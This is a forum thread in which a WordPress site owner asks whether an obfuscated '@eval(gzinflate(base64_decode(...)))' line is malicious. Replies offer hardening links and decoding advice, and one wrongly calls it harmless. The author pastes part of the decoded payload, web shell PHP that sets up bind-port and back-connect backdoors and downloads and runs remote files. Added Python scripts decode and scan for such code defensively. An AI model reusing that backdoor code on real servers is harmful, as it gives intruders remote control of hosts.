Is this Malicious code?

Is this line of code safe:

@eval(gzinflate(base64_decode($code)));

I found it in one of my WordPress files...
checkmofoshoduno Asked:
 
Phil Phillips, Director of DevOps & Quality Assurance, Commented:
Roads_Roads brings up a very good point.  You may want to run your site logs through something like OSSEC.

Also, here are some additional tips on how to make WordPress more secure:
http://codex.wordpress.org/Hardening_WordPress

And, here are a few blog posts that discuss how to recover from a hacked WordPress installation (hopefully, your installation isn't fully compromised, but these links also have additional security tips):
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In addition to that, you should still consider disabling eval (see my earlier comment), if you can.
0
 
eaglerod Commented:
No this is not malicious code.

The 'Code' represents the scrambled code (aka encoded text, aka obfuscated code) containing random letters, numbers and/or characters.
0
 
checkmofoshoduno (Author) Commented:
How can I check to see what the code actually is when it's decoded?
0
 
Phil Phillips, Director of DevOps & Quality Assurance, Commented:
I'm pretty sure that is malicious.  In fact, from what I can tell, eval(base64_decode(…)) is a common way of 'hacking' WordPress.

If you have the Suhosin patch, you might want to even consider disabling eval():
http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval
0
 
eaglerod Commented:
I believe this is what you are looking for.

Decoding Information
0
 
Jason C. Levine, No one, Commented:
Hi checkmofoshoduno,

It's probably code for an advertising link or something similar that some theme developers embed into the theme.  It may not be malicious, but it may be something you don't want there either.

I would find the $code variable and get the string and run it through a decoder, either on another site such as:

http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

or just as a simple echo statement in a PHP file you create.
0
 
m_walker Commented:
@eval(gzinflate(base64_decode($code)));

try
$Temp = gzinflate(base64_decode($code));
echo $Temp;

Not sure where $code gets its value from.
The code could be binary, so expect some weird results.
0
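The decode-without-executing approach from the comments above, as an added example that is not part of the original thread: it peels nested eval(gzinflate(base64_decode('...'))) layers as text only, in Python so that no PHP is ever run. The function names and the harmless sample are constructed for illustration; on a real file you would pass the string assigned to $code to decode_payload().

```python
import base64
import re
import zlib

# One layer: eval(gzinflate(base64_decode('...'))) with optional @ and spacing.
LAYER_RE = re.compile(
    r"""@?\s*eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"""
    r"""(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?""",
    re.IGNORECASE,
)

def php_gzinflate(data, limit=5_000_000):
    """Match PHP gzinflate(): raw DEFLATE, no header, with an output size cap."""
    d = zlib.decompressobj(-zlib.MAX_WBITS)
    out = d.decompress(data, limit)
    if d.unconsumed_tail:
        raise ValueError("decompressed output exceeds limit")
    return out

def decode_payload(b64_text):
    """Decode one layer to text; bytes that are not UTF-8 are replaced."""
    raw = base64.b64decode("".join(b64_text.split()), validate=True)
    return php_gzinflate(raw).decode("utf-8", errors="replace")

def peel(source, max_layers=20):
    """Unwrap nested layers; returns (innermost_text, layers_removed)."""
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.search(source)
        if not m:
            break
        source = decode_payload(m.group(2))
        layers += 1
    return source, layers

def make_sample_layer(php):
    """Build a constructed sample layer (demo input only)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    blob = c.compress(php.encode()) + c.flush()
    return "@eval(gzinflate(base64_decode('%s')));" % base64.b64encode(blob).decode()

# Constructed, harmless two-layer sample.
SAMPLE = make_sample_layer(make_sample_layer("echo 'constructed harmless sample';"))

if __name__ == "__main__":
    text, n = peel(SAMPLE)
    print(n, "layer(s) removed")
    print(text)
```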
 
checkmofoshoduno (Author) Commented:
Yep, I managed to also find that link for the decoder, and unless that site is messing with me I am seeing the output say "Load and Exploit" and a bunch of other not-so-good things such as Port Binding.

Looks like I will just remove that block of code for now...

Please see attached.
Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.
"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

0
 
Lukasz Chmielewski Commented:
The additional question: how did it get there? Change your access passwords to strong ones and do not store them locally on your computer.
0
 
Jason C. Levine, No one, Commented:
It's not necessarily a hack on the site.  I have seen code like this included in many, many free WordPress themes by the theme author.  If you are downloading free stuff directly from an author's web site (and not the WordPress site) make sure you go over it very carefully for exploits.
0
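One way to go over a downloaded theme or an existing install for the construct discussed in this thread, as an added example that is not part of the original thread: it walks a directory and reports every eval(base64_decode(...)) or eval(gzinflate(base64_decode(...))) call with its file and line. The file names in the demo are constructed; a hit means "review this by hand", not a verdict.

```python
import os
import re
import tempfile

# eval( [gzinflate(] base64_decode( ... with optional @, any spacing or newlines.
PATTERN = re.compile(
    r"@?\beval\s*\(\s*(?:gzinflate\s*\(\s*)?base64_decode\s*\(", re.IGNORECASE
)

def scan_tree(root, exts=(".php", ".inc", ".phtml")):
    """Return sorted (relative_path, line_no, matched_text) for each hit under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            # Search the whole file so a call split across lines still matches.
            for m in PATTERN.finditer(text):
                line_no = text.count("\n", 0, m.start()) + 1
                hits.append((rel, line_no, m.group(0)))
    return sorted(hits)

def demo():
    """Scan a constructed theme directory (sample files, not real ones)."""
    files = {
        "functions.php": "<?php\nfunction medieval($x) { return $x; }\n",
        "footer.php": "<?php\n// footer\n@eval(gzinflate(base64_decode($code)));\n",
        "inc/ads.php": "<?php eval (\n  base64_decode($s));\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(p, n) for p, n, _ in scan_tree(root)]

if __name__ == "__main__":
    for path, line in demo():
        print(f"{path}:{line}: obfuscated eval, review by hand")
```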